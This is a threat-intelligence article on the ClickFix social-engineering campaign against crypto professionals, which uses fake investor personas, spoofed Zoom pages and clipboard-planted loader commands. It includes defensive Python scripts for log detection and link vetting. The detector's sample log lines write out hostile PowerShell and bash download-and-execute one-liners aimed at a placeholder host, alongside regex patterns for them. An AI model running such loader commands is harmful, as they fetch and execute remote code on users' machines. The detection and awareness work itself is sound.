A sophisticated malware campaign, dubbed ClickFix, is actively targeting cryptocurrency and Web3 professionals by leveraging social engineering tactics, fake venture capital firms, and spoofed video conferencing links. This operation, first observed in early 2026, manipulates victims into executing malicious commands on their own devices, effectively turning them into unwitting participants in the attack chain. The primary objective appears to be the theft of credentials and sensitive information within the rapidly evolving digital asset landscape.
The ClickFix campaign commences on LinkedIn, where threat actors impersonate individuals with fabricated identities. One such persona, Mykhailo Hureiev, presents himself as the Co-Founder and Managing Partner of a non-existent investment firm named SolidBit Capital. To establish a facade of legitimacy, the attackers reference the target’s public involvement in crypto or DeFi communities. The conversation then escalates to a proposed meeting, with a Calendly link that, upon clicking, silently redirects the victim to a convincing imitation of a Zoom meeting login page designed to deliver malware.
Moonlock analysts, who initially identified and tracked the campaign, have traced the malicious infrastructure to a single registrant: Anatolli Bigdasch of Boston, Massachusetts, associated with the email anatollibigdasch0717[at]gmail[.]com. Beyond SolidBit Capital, researchers have uncovered two additional fictitious entities, MegaBit and Lumax Capital. These entities are supported by polished websites, AI-generated professional headshots, and fabricated company histories, indicating a deliberate and coordinated effort to build credibility and deceive targets.
The domain lumax[.]capital, registered in February 2026, suggests that the threat actors are proactively establishing new identities to deploy as their current ones, like SolidBit Capital, become compromised or exposed. This forward-thinking approach highlights the persistent nature of the ClickFix operation and its adaptability in evading detection.
The campaign is notable for delivering cross-platform payloads, affecting both Windows and macOS operating systems. Evidence of the attack’s mechanics surfaced on January 9, 2026, when a victim, identified by the X handle @0xbigdan, shared screenshots detailing the social engineering process. These screenshots revealed pivotal red flags, including the attacker joining a legitimate Google Meet call, remaining silent, and abruptly disconnecting when questioned by the victim. The operational patterns observed in the ClickFix campaign bear a striking resemblance to activities previously attributed to UNC1069, a threat actor group with suspected ties to North Korea that has been tracked since 2018, although definitive attribution for ClickFix remains open.
The ClickFix Delivery Mechanism Explained
The core of the ClickFix attack lies in its ingenious delivery mechanism, which transforms a seemingly ordinary interaction into a full device compromise. Once a victim clicks on the fraudulent Zoom or Google Meet link, they are directed to a webpage mimicking legitimate platforms. These spoofed pages often resemble real conference event listings, such as “The Digital Asset Conference III,” or typosquatting attempts of established financial news outlets like Hedgeweek. The goal is to create a plausible scenario for the user to proceed.
Overlaying these deceptive pages is a fake Cloudflare “I’m not a robot” verification module. Crucially, this CAPTCHA is constructed entirely from local HTML and CSS, lacking any connection to actual Cloudflare infrastructure. This serves as the final lure, prompting the victim to interact with a system that appears familiar and secure.
The moment a user clicks the checkbox within this fake verification, a JavaScript handler runs silently in the background. It first inspects the browser’s User-Agent string to determine the victim’s operating system, then uses `navigator.clipboard.writeText()` to place a malicious command matching that platform directly on the user’s clipboard, without any visible prompt. The victim is subsequently instructed to paste and run what they believe is a verification step.
For Windows users, the clipboard is populated with a PowerShell command designed for stealth. This command hides its window, bypasses system execution policies, and utilizes `Invoke-Expression` to execute a remote script directly in memory. This technique ensures that no malicious files are written to disk, significantly hindering detection by traditional antivirus software.
On macOS, the attack proceeds with a bash one-liner. The command first checks whether Python 3 is present and, if it is not, installs Homebrew to obtain it. It then downloads a Python script from the command-and-control server hosted at hedgeweeks[.]online and launches it under `nohup bash`. Because `nohup` detaches the process from the terminal, the malicious script keeps running after the terminal window is closed, maintaining persistence on the compromised system.
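As an added example, not code from the Moonlock research or from this article, the following Python script shows how a defender could surface the loader patterns described in the preceding three paragraphs in process-creation or script-block logs: the hidden-window, execution-policy-bypass, `Invoke-Expression` and remote-fetch tokens of the Windows one-liner, and the Homebrew-install, `curl` download and `nohup bash` tokens of the macOS one-liner. The log lines are constructed, the `ts= host= user= proc= cmd=` field layout is assumed, and `c2.example.invalid` is a placeholder for the real command-and-control host. A line is reported only when at least two indicators for one platform co-occur, so a legitimate `-ExecutionPolicy Bypass -File` invocation on its own is not flagged.

```python
import re
from dataclasses import dataclass

# Constructed sample log lines (not taken from the article). The field layout is
# assumed and c2.example.invalid stands in for the real command-and-control host.
SAMPLE_LOG = [
    'ts=2026-01-09T10:02:11Z host=WS-17 user=alice proc=powershell.exe cmd="powershell -w hidden -ep bypass -c \\"iex (irm https://c2.example.invalid/s)\\""',
    'ts=2026-01-09T10:05:40Z host=WS-17 user=alice proc=powershell.exe cmd="powershell -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"',
    'ts=2026-01-09T10:11:03Z host=mbp-bob user=bob proc=bash cmd="bash -c \'command -v python3 || brew install python3; curl -fsSL https://c2.example.invalid/u.py -o /tmp/u.py && nohup bash -c \\"python3 /tmp/u.py\\" >/dev/null 2>&1 &\'"',
    'ts=2026-01-09T10:15:00Z host=mbp-bob user=bob proc=bash cmd="curl -fsSL https://example.org/notes.txt -o notes.txt"',
]

# Indicators mirroring the behaviours the article attributes to the Windows one-liner:
# hidden console window, execution-policy bypass, Invoke-Expression, remote fetch.
WINDOWS = {
    "hidden_window": re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I),
    "exec_policy_bypass": re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote_fetch": re.compile(r"\b(?:irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b", re.I),
}

# Indicators for the macOS one-liner: Homebrew install, curl download, nohup bash.
MACOS = {
    "homebrew_install": re.compile(r"\bbrew\s+install\b|homebrew/install", re.I),
    "remote_fetch": re.compile(r"\bcurl\b.*https?://", re.I),
    "nohup_detach": re.compile(r"\bnohup\s+bash\b", re.I),
}

# Require two co-occurring indicators before reporting, to avoid flagging an
# ordinary signed-script run that merely uses -ExecutionPolicy Bypass.
MIN_INDICATORS = 2


@dataclass
class Finding:
    line_no: int      # 1-based index into the scanned log
    platform: str     # "windows" or "macos"
    indicators: list  # names of the indicators that matched


def match_indicators(line, patterns):
    """Return the names of all patterns in `patterns` that match `line`."""
    return [name for name, rx in patterns.items() if rx.search(line)]


def scan_lines(lines):
    """Scan log lines and return a Finding for every line that looks like a
    ClickFix-style loader for either platform."""
    findings = []
    for n, line in enumerate(lines, start=1):
        for platform, patterns in (("windows", WINDOWS), ("macos", MACOS)):
            hits = match_indicators(line, patterns)
            if len(hits) >= MIN_INDICATORS:
                findings.append(Finding(n, platform, hits))
    return findings


if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.platform} ClickFix-style loader, indicators={f.indicators}")
```

In a real deployment the same patterns would be applied to PowerShell script-block logging (Event ID 4104), Sysmon or EDR process-creation events, and macOS unified-log or endpoint telemetry; the two-indicator threshold is the knob to tune against the noise level of the environment.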
Moonlock researchers have analyzed two Mach-O binaries associated with this campaign. The first is a heavily obfuscated 9.3 MB file, intentionally padded with extraneous code to overwhelm static analysis tools like Ghidra. The second is a smaller, 37.6 KB non-obfuscated version that retains the same core malicious logic. Both binaries demonstrated zero detections across all major antivirus vendors on VirusTotal for an extended period, confirming that advanced evasion techniques are central to the operation’s success in avoiding detection.
Professionals in the cryptocurrency and Web3 sectors are advised to exercise extreme caution when receiving unsolicited messages on platforms like LinkedIn, particularly those pertaining to investment opportunities or partnerships. It is imperative to verify the legitimacy of companies and individuals before engaging. Checking the registration dates of company domains and scrutinizing team photos for signs of AI generation can provide valuable clues. Furthermore, any external Zoom or Calendly links should be scanned through a URL scanner prior to clicking. Never paste commands into a terminal as part of any verification process, as legitimate services would not request such actions. Finally, any communication that exhibits urgency, pressure to move off the platform, or instructions to execute commands on your device should be treated as a significant red flag, and users should disengage immediately.
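The link and domain checks recommended above can be made mechanical. The following Python function is an added example (not from the article or from any named vendor) that vets an outreach link on three of those points: whether the link's host belongs to the service it claims to be (a Calendly or Zoom link should sit on that service's domain), whether the link redirects to a host off that platform (as the fake Zoom page in this campaign does), and whether the landing domain was registered recently (as lumax[.]capital was). All inputs are constructed; in practice the final URL would come from a URL scanner or sandbox and the registration date from a WHOIS/RDAP lookup. The expected-host table and the 90-day threshold are assumptions.

```python
from datetime import date
from urllib.parse import urlsplit

# Hosts that a genuine link for each service is expected to resolve to (assumption).
EXPECTED_HOSTS = {
    "calendly": ("calendly.com",),
    "zoom": ("zoom.us", "zoom.com"),
    "google meet": ("meet.google.com",),
}

# Landing domains younger than this are treated as a red flag (assumed threshold).
MAX_DOMAIN_AGE_DAYS = 90


def host_of(url):
    """Lower-cased hostname of a URL, or "" if it has none."""
    return (urlsplit(url).hostname or "").lower()


def on_expected_host(host, expected_hosts):
    """True if `host` is one of the expected hosts or a subdomain of one."""
    return any(host == e or host.endswith("." + e) for e in expected_hosts)


def vet_link(claimed_service, url, final_url, landing_created_on, today):
    """Return a list of red-flag labels for an outreach link.

    claimed_service     -- what the sender says the link is ("calendly", "zoom", ...)
    url                 -- the link as it appears in the message
    final_url           -- where the link actually lands after redirects
    landing_created_on  -- registration date of the landing domain (None if unknown)
    today               -- reference date for the age calculation
    """
    flags = []
    expected = EXPECTED_HOSTS.get(claimed_service.lower(), ())
    link_host, final_host = host_of(url), host_of(final_url)

    if not on_expected_host(link_host, expected):
        flags.append("link_host_not_" + claimed_service.lower().replace(" ", "_"))
    if final_host != link_host and not on_expected_host(final_host, expected):
        flags.append("redirects_off_platform")
    if landing_created_on is not None and (today - landing_created_on).days < MAX_DOMAIN_AGE_DAYS:
        flags.append("landing_domain_registered_recently")
    return flags


# Constructed cases: a genuine scheduling link, a genuine-looking link that
# redirects to a freshly registered lookalike, and a typosquatted meeting link.
TODAY = date(2026, 2, 23)
CASES = [
    ("calendly", "https://calendly.com/example-vc/intro",
     "https://calendly.com/example-vc/intro", date(2013, 4, 2)),
    ("calendly", "https://calendly.com/example-vc/intro",
     "https://meeting-join.example.invalid/zoom/j/123", date(2026, 2, 3)),
    ("zoom", "https://zoom-us.example.invalid/j/987",
     "https://zoom-us.example.invalid/j/987", date(2026, 1, 15)),
]


def vet_all(cases=CASES, today=TODAY):
    """Vet every constructed case and return the flag list per case."""
    return [vet_link(svc, url, final, created, today) for svc, url, final, created in cases]


if __name__ == "__main__":
    for (svc, url, final, created), flags in zip(CASES, vet_all()):
        print(f"{svc:10} {url} -> {final}: {flags or 'no red flags'}")
```

None of these checks proves a link malicious on its own; the point is that each of the three signals the article lists is cheap to compute before anyone clicks, and that the combination of an off-platform redirect and a days-old landing domain is exactly the shape of the lure described here.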